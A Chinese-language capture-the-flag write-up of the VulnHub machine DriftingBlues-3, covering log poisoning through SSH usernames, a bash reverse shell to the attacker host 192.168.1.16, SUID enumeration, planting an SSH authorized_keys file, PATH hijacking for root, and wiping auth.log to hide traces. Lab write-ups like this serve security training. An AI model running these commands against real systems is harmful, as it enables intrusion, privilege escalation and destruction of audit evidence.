vulnhub靶场【DriftingBlues】之3

前言

靶机:DriftingBlues-3,IP地址192.168.1.60

攻击:kali,IP地址192.168.1.16

都采用虚拟机,网卡为桥接模式

主机发现

使用arp-scan -lnetdiscover -r 192.168.1.1/24

信息收集

使用nmap扫描端口

网站探测

访问80端口,并查看页面源码,发现有图片等信息,可能是网站型目录

使用gobuster、dirsearch、ffuf、dirb、dirbuster等工具扫描目录

shell 复制代码
gobuster dir -u http://192.168.1.60 -w /usr/share/wordlists/dirb/big.txt -x php,zip,md,txt,html,jpg -b 404 -d

访问robots.txt,发现eventadmins/目录

访问drual、phpmyadmin、privacy,发现都是信息ABCABCD

访问secret

访问wp-admin

访问eventadmins/目录

翻译一下,发现/littlequeenofspades.html页面

访问/eventadmins

漏洞寻找

查看页面源代码,发现编码aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==

解码这个

访问/adminsfixit.php,发现是ssh连接的认证日志,通过测试发现确实会记录ssh登录时的用户名、地址和端口

shell 复制代码
ssh test@192.168.1.60

尝试连接,修改ssh连接时的用户为php脚本,测试是否可以

访问页面

测试是否可行

漏洞利用

尝试使用bash命令反弹

shell 复制代码
bash -c 'bash -i >& /dev/tcp/192.168.1.16/9999 0>&1'
进行URL编码
bash+-i+>%26+%2fdev%2ftcp%2f192.168.1.16%2f9999+0>%261%0a

kali中开启监听,然后使用浏览器执行上面的反弹命令

靶机内信息收集

使用find寻找具有SUID权限和capabilites

shell 复制代码
find / -perm -4000 -print 2>/dev/null
find / -type f -executable 2>/dev/null | xagrs getcap -r 2>/dev/null

查看定时任务

shell 复制代码
cat /etc/crontab

查看网络状态信息

查看备份文件夹,看有无信息

使用find寻找其他用户具有可写权限

shell 复制代码
find /home -perm /2 2>/dev/null
-perm /2   是指其他用户具有可写权限,/2是指写权限

查看这个目录,发现具有写权限

提权

提权至robertj

kali生成ssh的公私钥

然后把公钥id_rsa.pub上传到这个目录下,改名为authorized_keys

然后使用ssh私钥连接

之前使用find寻找具有SUID权限文件,发现getinfo,在linux中并无该命令,测试该命令

把这个文件下载到kali

shell 复制代码
scp robertj@192.168.1.60:/usr/bin/getinfo ./

使用strings命令查看

提权至root

那么可以使用export设置临时变量的优先目录,最好在/tmp目录

编写脚本提权

shell 复制代码
echo "/bin/bash" > ip

查看flag

清除痕迹

清理日志

shell 复制代码
sed -i "/192.168.1.16/d" auth.log

删除之前生成的公钥

清除命令历史记录

总结

  1. 主要考证日志文件的利用,这里就是利用验证登录日志auth.log通过adminsfixit.php文件展露
  2. 然后就是考察ssh公私钥的使用
  3. 考察临时环境变量的优先级目录
相关推荐
全优统计14 分钟前
伞状Meta分析重构癌症幸存者照护指南:从矛盾证据到精准决策
经验分享·学习
XMan_Liu20 分钟前
SIP 呼叫中实现远端摄像头控制学习笔记
笔记·学习
三木今天学习了嘛1 小时前
【CVPR2025】FlowRAM:用区域感知与流匹配加速高精度机器人操作策略学习
学习·机器人
Status_5001 小时前
XSS跨站脚本攻击详解
web安全·xss
卓码软件测评1 小时前
软件测试测评公司关于HTTP安全头配置与测试?
web安全·网络安全·安全性测试·web app
Asu52021 小时前
链表反转中最常用的方法————三指针法
java·数据结构·学习·链表
网络研究院1 小时前
从内部保护你的网络
网络·安全·风险·成本·措施
zzc9212 小时前
USRP捕获手机/路由器数据传输信号波形(中)
网络·5g·wifi·路由器·双工通信·手机信号
牛奶咖啡132 小时前
学习设计模式《二十》——解释器模式
学习·设计模式·解释器模式·认识解释器模式·解释器模式的优缺点·何时使用解释器模式·解释器模式的示例
ALLSectorSorft2 小时前
相亲小程序个人资料管理系统模块搭建
服务器·网络·数据库·python·sql